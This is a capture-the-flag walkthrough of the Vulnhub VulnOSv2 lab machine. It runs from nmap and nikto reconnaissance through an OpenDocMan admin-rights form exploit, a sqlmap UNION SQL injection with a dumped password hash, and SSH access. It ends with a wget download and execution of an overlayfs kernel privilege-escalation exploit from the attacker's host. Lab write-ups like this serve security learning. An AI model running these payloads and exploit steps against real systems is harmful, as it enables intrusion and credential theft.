Vulnhub VulnOSv2
Vulnhub
VulnOSv2
Let’s do this. Another beautiful nmap scan
nmap -sS -sC -A -T 4 -p- 192.168.1.114 -oN nmap_scan
Starting Nmap 7.40 ( https://nmap.org ) at 2017-05-18 16:11 EDT
Nmap scan report for VulnOSv2 (192.168.1.114)
Host is up (0.00045s latency).
Not shown: 65532 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 6.6.1p1 Ubuntu 2ubuntu2.6 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 1024 f5:4d:c8:e7:8b:c1:b2:11:95:24:fd:0e:4c:3c:3b:3b (DSA)
| 2048 ff:19:33:7a:c1:ee:b5:d0:dc:66:51:da:f0:6e:fc:48 (RSA)
|_ 256 ae:d7:6f:cc:ed:4a:82:8b:e8:66:a5:11:7a:11:5f:86 (ECDSA)
80/tcp open http Apache httpd 2.4.7 ((Ubuntu))
|_http-server-header: Apache/2.4.7 (Ubuntu)
|_http-title: VulnOSv2
6667/tcp open irc ngircd
MAC Address: 08:00:27:57:4F:AA (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.6
Network Distance: 1 hop
Service Info: Host: irc.example.net; OS: Linux; CPE: cpe:/o:linux:linux_kernel
TRACEROUTE
HOP RTT ADDRESS
1 0.45 ms VulnOSv2 (192.168.1.114)
Alright, so a website, ssh and an irc port..?
Let’s investigate the website
Nikto
When we load the website we get a link to visit the “real” website 192.168.1.114/jabc/, i’ll run a nikto on both just incase.
The /jabc/ has the good info.
nikto -h 192.168.1.114
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP: 192.168.1.114
+ Target Hostname: 192.168.1.114
+ Target Port: 80
+ Start Time: 2017-05-19 08:08:45 (GMT-4)
---------------------------------------------------------------------------
+ Server: Apache/2.4.7 (Ubuntu)
+ Retrieved x-powered-by header: PHP/5.5.9-1ubuntu4.14
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ Uncommon header 'x-generator' found, with contents: Drupal 7 (http://drupal.org)
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ OSVDB-3268: /jabc/scripts/: Directory indexing found.
+ Server leaks inodes via ETags, header found with file /jabc/robots.txt, fields: 0x619 0x53099f194b54d
+ OSVDB-3268: /jabc/includes/: Directory indexing found.
+ Entry '/includes/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ OSVDB-3268: /jabc/misc/: Directory indexing found.
+ Entry '/misc/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ OSVDB-3268: /jabc/modules/: Directory indexing found.
+ Entry '/modules/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ OSVDB-3268: /jabc/profiles/: Directory indexing found.
+ Entry '/profiles/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ Entry '/scripts/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ OSVDB-3268: /jabc/themes/: Directory indexing found.
+ Entry '/themes/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ Entry '/install.php' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ Entry '/xmlrpc.php' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ Entry '/?q=filter/tips/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ Entry '/?q=user/password/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ Entry '/?q=user/register/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ Entry '/?q=user/login/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ "robots.txt" contains 36 entries which should be manually viewed.
+ Apache/2.4.7 appears to be outdated (current is at least Apache/2.4.12). Apache 2.0.65 (final release) and 2.2.29 are also current.
+ Allowed HTTP Methods: GET, HEAD, POST, OPTIONS
+ Web Server returns a valid response with junk HTTP methods, this may cause false positives.
+ DEBUG HTTP verb may show server debugging information. See http://msdn.microsoft.com/en-us/library/e8z01xdh%28VS.80%29.aspx for details.
+ OSVDB-3092: /jabc/includes/: This might be interesting...
+ OSVDB-3092: /jabc/misc/: This might be interesting...
+ OSVDB-3092: /jabc/scripts/: This might be interesting... possibly a system shell found.
+ OSVDB-3092: /jabc/install.php: Drupal install.php file found.
+ OSVDB-3092: /jabc/install.php: install.php file found.
+ OSVDB-3092: /jabc/xmlrpc.php: xmlrpc.php was found.
+ OSVDB-3268: /jabc/sites/: Directory indexing found.
+ 8383 requests: 0 error(s) and 36 item(s) reported on remote host
+ End Time: 2017-05-19 08:09:02 (GMT-4) (17 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested
It’s running apache 2.4.7 with php 5.5.9. Seems to be running Drupal 7.
A lot of the install files are visible from the outside. That’s good news for
us.
I looked up for all the versions found in there in searchsploit hoping to find some vulnerable software. I didn’t find anything.
I browsed the website looking at the source code just incase something was left out. It paid off, i found a suspicious page didn’t show anything.
The page being Documentation /jabc/?q=node/7, we can find this in the source
code of the page.
<div class="field field-name-body field-type-text-with-summary field-label-hidden"><div class="field-items"><div class="field-item even" property="content:encoded"><p><span style="color:#000000">Dear customer,</span></p>
<p><span style="color:#000000">For security reasons, this section is hidden.</span></p>
<p><span style="color:#000000">For a detailed view and documentation of our products, please visit our documentation platform at /jabcd0cs/ on the server. Just login with guest/guest</span></p>
<p><span style="color:#000000">Thank you.</span></p>
/jabcd0cs/ looks like a page and with even got a login, how nice is that.
Opendocman
Once you browse /jabcd0cs/ we encounter a login. The name of the software is
everywhere, it’s called Opendocman. We can see that it’s running v1.2.7.
Let’s look it up in searchsploit
-------------------------------------------------------------------------------------------------------------------------------------------------- -----------------------------
Exploit Title | Path
| (/usr/share/exploitdb/platforms)
-------------------------------------------------------------------------------------------------------------------------------------------------- ------------------------------
OpenDocMan 1.2.5 - Cross-Site Scripting / SQL Injection | ./php/webapps/9903.txt
OpenDocMan 1.2.6.1 - Cross-Site Request Forgery (Password Change) | ./php/webapps/20709.html
OpenDocMan 1.2.6.5 - Persistent Cross-Site Scripting | ./php/webapps/25250.txt
OpenDocMan 1.x - 'out.php' Cross-Site Scripting | ./php/webapps/31933.txt
OpenDocMan 1.2.7 - Multiple Vulnerabilities | ./php/webapps/32075.txt
OpenDocMan 1.2.5 - add.php last_message Parameter Cross-Site Scripting | ./php/webapps/33295.txt
OpenDocMan 1.2.5 - toBePublished.php Multiple Parameter Cross-Site Scripting | ./php/webapps/33296.txt
OpenDocMan 1.2.5 - 'index.php' last_message Parameter Cross-Site Scripting | ./php/webapps/33297.txt
OpenDocMan 1.2.5 - admin.php last_message Parameter Cross-Site Scripting | ./php/webapps/33298.txt
OpenDocMan 1.2.5 - category.php Cross-Site Scripting | ./php/webapps/33299.txt
OpenDocMan 1.2.5 - department.php Cross-Site Scripting | ./php/webapps/33300.txt
OpenDocMan 1.2.5 - profile.php Cross-Site Scripting | ./php/webapps/33301.txt
OpenDocMan 1.2.5 - rejects.php Cross-Site Scripting | ./php/webapps/33302.txt
OpenDocMan 1.2.5 - search.php Cross-Site Scripting | ./php/webapps/33303.txt
OpenDocMan 1.2.5 - user.php Cross-Site Scripting | ./php/webapps/33304.txt
OpenDocMan 1.2.5 - view_file.php Cross-Site Scripting | ./php/webapps/33305.txt
OpenDocMan 1.3.4 - Cross-Site Request Forgery | ./php/webapps/39414.txt
-------------------------------------------------------------------------------------------------------------------------------------------------- -----------------------------
We got a match in OpenDocMan 1.2.7 - Multiple Vulnerabilities.
Let’s look at the file.
We got some sql injection and improper access control. We can give ourself
admin rights with the second exploit. Let’s login with guest/guest first.
Once we login first thing we can see is that we can upload a file.
Let’s upload an reverse shell.
So after trying to upload a shell as jpeg/jpg/png/gif the shell didn’t want to pop up.
I guess it’s time to try to get admin rights on Opendocman.
Using the documentation i created a html page with the following content.
<form action="http://192.168.1.114/jabcd0cs/signup.php" method="post"
name="main">
<input type="hidden" name="updateuser" value="1">
<input type="hidden" name="admin" value="1">
<input type="hidden" name='id' value='2'>
<input type="submit" name="login" value="Run">
</form>
And executed it with a browser. I had a couple of errors at first but it did
work eventually. I sadly don’t know what was creating the error. I found the
userid by looking at the profile in the website.
As admin, we’ll change the password of the other user on the website. Admin -> Update Users and change the password.
We’ll login as webmin and go in the admin panel and add the text/x-php file type.
Admin -> settings -> edit file types.
After a few hours, i gave up on that path. I really tried everything i could find to get an reverse shell with an image/php/java and nada.
Let’s use the other vulnerability the sqli.
SQLMAP
We know that the server is vulnerable to sqli. Let’s launch sqlmap
sqlmap --url "http://192.168.1.114/jabcd0cs/ajax_udf.php?q=1&add_value=odm_user*"
_
___ ___| |_____ ___ ___ {1.0.9.1#dev}
|_ -| . | | | .'| . |
|___|_ |_|_|_|_|__,| _|
|_| |_| http://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting at 12:06:11
custom injection marking character ('*') found in option '-u'. Do you want to process it? [Y/n/q] y
[12:06:13] [INFO] testing connection to the target URL
[12:06:13] [INFO] heuristics detected web page charset 'ISO-8859-2'
[12:06:13] [INFO] checking if the target is protected by some kind of WAF/IPS/IDS
[12:06:13] [INFO] testing if the target URL is stable
[12:06:14] [INFO] target URL is stable
[12:06:14] [INFO] testing if URI parameter '#1*' is dynamic
[12:06:14] [INFO] confirming that URI parameter '#1*' is dynamic
[12:06:14] [INFO] URI parameter '#1*' is dynamic
[12:06:14] [INFO] heuristics detected web page charset 'ascii'
[12:06:14] [WARNING] heuristic (basic) test shows that URI parameter '#1*' might not be injectable
[12:06:14] [INFO] testing for SQL injection on URI parameter '#1*'
[12:06:15] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[12:06:15] [INFO] testing 'MySQL >= 5.0 boolean-based blind - Parameter replace'
[12:06:15] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)'
[12:06:16] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'
[12:06:16] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause'
[12:06:16] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)'
[12:06:16] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace (FLOOR)'
[12:06:16] [INFO] testing 'MySQL inline queries'
[12:06:17] [INFO] testing 'PostgreSQL inline queries'
[12:06:17] [INFO] testing 'Microsoft SQL Server/Sybase inline queries'
[12:06:17] [INFO] testing 'MySQL > 5.0.11 stacked queries (comment)'
[12:06:17] [INFO] testing 'PostgreSQL > 8.1 stacked queries (comment)'
[12:06:17] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries (comment)'
[12:06:17] [INFO] testing 'Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE - comment)'
[12:06:18] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind'
[12:06:18] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind'
[12:06:18] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind'
[12:06:19] [INFO] testing 'Oracle AND time-based blind'
[12:06:19] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
[12:06:19] [WARNING] using unescaped version of the test because of zero knowledge of the back-end DBMS. You can try to explicitly set it with option '--dbms'
[12:06:19] [WARNING] reflective value(s) found and filtering out
[12:06:19] [INFO] 'ORDER BY' technique appears to be usable. This should reduce the time needed to find the right number of query columns. Automatically extending the range for current UNION query injection technique test
[12:06:20] [INFO] target URL appears to have 9 columns in query
[12:06:20] [WARNING] applying generic concatenation with double pipes ('||')
injection not exploitable with NULL values. Do you want to try with a random integer value for option '--union-char'? [Y/n] y
[12:06:30] [WARNING] if UNION based SQL injection is not detected, please consider forcing the back-end DBMS (e.g. '--dbms=mysql')
[12:06:37] [INFO] testing 'MySQL UNION query (14) - 1 to 10 columns'
[12:06:39] [INFO] heuristics detected web page charset 'windows-1252'
[12:06:40] [INFO] URI parameter '#1*' is 'MySQL UNION query (14) - 1 to 10 columns' injectable
it looks like the back-end DBMS is 'MySQL'. Do you want to skip test payloads specific for other DBMSes? [Y/n] y
for the remaining tests, do you want to include all tests for 'MySQL' extending provided level (1) and risk (1) values? [Y/n] y
URI parameter '#1*' is vulnerable. Do you want to keep testing the others (if any)? [y/N] n
sqlmap identified the following injection point(s) with a total of 360 HTTP(s) requests:
---
Parameter: #1* (URI)
Type: UNION query
Title: MySQL UNION query (14) - 9 columns
Payload: http://192.168.1.114:80/jabcd0cs/ajax_udf.php?q=1&add_value=odm_user UNION ALL SELECT CONCAT(0x71707a7071,0x4859746d506b4c4f78727249645668576b7a415476427852497a6e46596c766f6d78597a644a6573,0x71767a7071),14,14,14,14,14,14,14,14#
---
[12:06:54] [INFO] testing MySQL
[12:06:54] [INFO] confirming MySQL
[12:06:55] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu
web application technology: Apache 2.4.7, PHP 5.5.9
back-end DBMS: MySQL >= 5.0.0
[12:06:55] [INFO] fetched data logged to text files under '/root/.sqlmap/output/192.168.1.114'
[*] shutting down at 12:06:55
We can see that sqlmap found that is was vulnerable. Let’s dump the tables.
Database: phpmyadmin
[12 tables]
+----------------------------------------------+
| pma_bookmark |
| pma_column_info |
| pma_designer_coords |
| pma_history |
| pma_pdf_pages |
| pma_recent |
| pma_relation |
| pma_table_coords |
| pma_table_info |
| pma_table_uiprefs |
| pma_tracking |
| pma_userconfig |
+----------------------------------------------+
Database: performance_schema
[17 tables]
+----------------------------------------------+
| cond_instances |
| events_waits_current |
| events_waits_history |
| events_waits_history_long |
| events_waits_summary_by_instance |
| events_waits_summary_by_thread_by_event_name |
| events_waits_summary_global_by_event_name |
| file_instances |
| file_summary_by_event_name |
| file_summary_by_instance |
| mutex_instances |
| performance_timers |
| rwlock_instances |
| setup_consumers |
| setup_instruments |
| setup_timers |
| threads |
+----------------------------------------------+
Database: jabcd0cs
[15 tables]
+----------------------------------------------+
| odm_access_log |
| odm_admin |
| odm_category |
| odm_data |
| odm_department |
| odm_dept_perms |
| odm_dept_reviewer |
| odm_filetypes |
| odm_log |
| odm_odmsys |
| odm_rights |
| odm_settings |
| odm_udf |
| odm_user |
| odm_user_perms |
+----------------------------------------------+
Database: mysql
[24 tables]
+----------------------------------------------+
| user |
| columns_priv |
| db |
| event |
| func |
| general_log |
| help_category |
| help_keyword |
| help_relation |
| help_topic |
| host |
| ndb_binlog_index |
| plugin |
| proc |
| procs_priv |
| proxies_priv |
| servers |
| slow_log |
| tables_priv |
| time_zone |
| time_zone_leap_second |
| time_zone_name |
| time_zone_transition |
| time_zone_transition_type |
+----------------------------------------------+
Database: drupal7
[140 tables]
+----------------------------------------------+
| actions |
| aggregator_category |
| aggregator_category_feed |
| aggregator_category_item |
| aggregator_feed |
| aggregator_item |
| authmap |
| batch |
| block |
| block_custom |
| block_node_type |
| block_role |
| blocked_ips |
| book |
| cache |
| cache_block |
| cache_bootstrap |
| cache_field |
| cache_filter |
| cache_form |
| cache_image |
| cache_menu |
| cache_page |
| cache_path |
| cache_rules |
| cache_token |
| cache_update |
| cache_views |
| cache_views_data |
| ckeditor_input_format |
| ckeditor_settings |
| comment |
| commerce_calculated_price |
| commerce_checkout_pane |
| commerce_customer_profile |
| commerce_customer_profile_revision |
| commerce_line_item |
| commerce_order |
| commerce_order_revision |
| commerce_payment_transaction |
| commerce_payment_transaction_revision |
| commerce_product |
| commerce_product_revision |
| commerce_product_type |
| contact |
| ctools_access_ruleset |
| ctools_css_cache |
| ctools_custom_content |
| ctools_object_cache |
| date_format_locale |
| date_format_type |
| date_formats |
| field_config |
| field_config_instance |
| field_data_body |
| field_data_comment_body |
| field_data_commerce_customer_address |
| field_data_commerce_customer_billing |
| field_data_commerce_display_path |
| field_data_commerce_line_items |
| field_data_commerce_order_total |
| field_data_commerce_price |
| field_data_commerce_product |
| field_data_commerce_total |
| field_data_commerce_unit_price |
| field_data_field_description |
| field_data_field_image |
| field_data_field_product |
| field_data_field_tags |
| field_revision_body |
| field_revision_comment_body |
| field_revision_commerce_customer_address |
| field_revision_commerce_customer_billing |
| field_revision_commerce_display_path |
| field_revision_commerce_line_items |
| field_revision_commerce_order_total |
| field_revision_commerce_price |
| field_revision_commerce_product |
| field_revision_commerce_total |
| field_revision_commerce_unit_price |
| field_revision_field_description |
| field_revision_field_image |
| field_revision_field_product |
| field_revision_field_tags |
| file_managed |
| file_usage |
| filter |
| filter_format |
| flood |
| history |
| image_effects |
| image_styles |
| menu_custom |
| menu_links |
| menu_router |
| node |
| node_access |
| node_comment_statistics |
| node_revision |
| node_type |
| page_manager_handlers |
| page_manager_pages |
| page_manager_weights |
| queue |
| rdf_mapping |
| registry |
| registry_file |
| role |
| role_permission |
| rules_config |
| rules_dependencies |
| rules_scheduler |
| rules_tags |
| rules_trigger |
| search_dataset |
| search_index |
| search_node_links |
| search_total |
| semaphore |
| sequences |
| sessions |
| shortcut_set |
| shortcut_set_users |
| simpletest |
| simpletest_test_id |
| stylizer |
| system |
| taxonomy_index |
| taxonomy_term_data |
| taxonomy_term_hierarchy |
| taxonomy_vocabulary |
| tracker_node |
| tracker_user |
| url_alias |
| users |
| users_roles |
| variable |
| views_display |
| views_view |
| watchdog |
+----------------------------------------------+
Database: information_schema
[40 tables]
+----------------------------------------------+
| CHARACTER_SETS |
| COLLATIONS |
| COLLATION_CHARACTER_SET_APPLICABILITY |
| COLUMNS |
| COLUMN_PRIVILEGES |
| ENGINES |
| EVENTS |
| FILES |
| GLOBAL_STATUS |
| GLOBAL_VARIABLES |
| INNODB_BUFFER_PAGE |
| INNODB_BUFFER_PAGE_LRU |
| INNODB_BUFFER_POOL_STATS |
| INNODB_CMP |
| INNODB_CMPMEM |
| INNODB_CMPMEM_RESET |
| INNODB_CMP_RESET |
| INNODB_LOCKS |
| INNODB_LOCK_WAITS |
| INNODB_TRX |
| KEY_COLUMN_USAGE |
| PARAMETERS |
| PARTITIONS |
| PLUGINS |
| PROCESSLIST |
| PROFILING |
| REFERENTIAL_CONSTRAINTS |
| ROUTINES |
| SCHEMATA |
| SCHEMA_PRIVILEGES |
| SESSION_STATUS |
| SESSION_VARIABLES |
| STATISTICS |
| TABLES |
| TABLESPACES |
| TABLE_CONSTRAINTS |
| TABLE_PRIVILEGES |
| TRIGGERS |
| USER_PRIVILEGES |
| VIEWS |
+----------------------------------------------+
[12:08:16] [INFO] fetched data logged to text files under '/root/.sqlmap/output/192.168.1.114'
[*] shutting down at 12:08:16
After doing a full dump and greping through the results, i found the line that i was looking for.
log:| 1 | 5555551212 | [email protected] | webmin | 8f036369a5cd26454949e594fb9e0a2d | min | web | 2 | <blank> |
The password is encrypted in md5, so using a online decrypter we can see that the password is lol123… The password that i setup when i changed the password.
So after spending countless hours without finding a way, i had to go see what i did wrong. So after reading a quick writeup, i realise that i fucked up when i decided to change webmin password… Lost a lot of hours because of that.
So i had reinstalled the machine and redid the sql map.
log: | 1 | 5555551212 | [email protected] | webmin | b78aae356709f8c31118ea613980954b | min | web | 2 | <blank> |
That was the right line that i had to find. The right password was webmin1980.
Knowing that password we could have used it to try to login via ssh.
Enumeration
Once we’re in, let’s look at the kernel version.
uname -a
Linux VulnOSv2 3.13.0-24-generic #47-Ubuntu SMP Fri May 2 23:31:42 UTC 2014 i686 i686 i686 GNU/Linux
Searchsploit got multiple hits on that kernel version, let’s try them out.
-------------------------------------------------------------------------------------------------------------------------------------------------- ----------------------------------
Exploit Title | Path
| (/usr/share/exploitdb/platforms)
-------------------------------------------------------------------------------------------------------------------------------------------------- ----------------------------------
Apple Mac OSX xnu 1228.3.13 - (macfsstat) Local Kernel Memory Leak/Denial of Service | ./osx/dos/8263.c
pam-krb5 < 3.13 - Privilege Escalation | ./linux/local/8303.c
Linux Kernel 3.4 < 3.13.2 (Ubuntu 13.10) - 'CONFIG_X86_X32' Arbitrary Write Exploit (2) | ./linux/local/31346.c
Linux Kernel 3.4 < 3.13.2 (Ubuntu 13.04/13.10) - 'CONFIG_X86_X32=y' Privilege Escalation (3) | ./linux/local/31347.c
Linux Kernel 3.13 - Privilege Escalation PoC (gid) | ./linux/local/33824.c
Linux Kernel 3.13 / 3.14 (Ubuntu) - 'splice()' System Call Local Denial of Service | ./linux/dos/36743.c
Linux Kernel 3.13.0 < 3.19 (Ubuntu 12.04/14.04/14.10/15.04) - 'overlayfs' Privilege Escalation | ./linux/local/37292.c
Linux Kernel 3.13.0 < 3.19 (Ubuntu 12.04/14.04/14.10/15.04) - 'overlayfs' Privilege Escalation (Access /etc/shadow) | ./linux/local/37293.txt
-------------------------------------------------------------------------------------------------------------------------------------------------- ----------------------------------
So we’ll transfer 37292, using a simple python server to transfer it
wget 192.168.1.148:8000/37292.c
--2017-05-22 05:04:34-- http://192.168.1.148:8000/37292.c
Connecting to 192.168.1.148:8000... connected.
HTTP request sent, awaiting response... 200 OK
Length: 5123 (5.0K) [text/plain]
Saving to: ā37292.cā
100%[===========================================================================================================================================>] 5,123 --.-K/s in 0s
2017-05-22 05:04:34 (374 MB/s) - ā37292.cā saved [5123/5123]
webmin@VulnOSv2:~$ gcc 37292.c
webmin@VulnOSv2:~$ ./
a.out .cache/ post/
webmin@VulnOSv2:~$ ./a.out
spawning threads
mount #1
mount #2
child threads done
/etc/ld.so.preload created
creating shared library
# id
uid=0(root) gid=0(root) groups=0(root),1001(webmin)
#
And yeah… gg.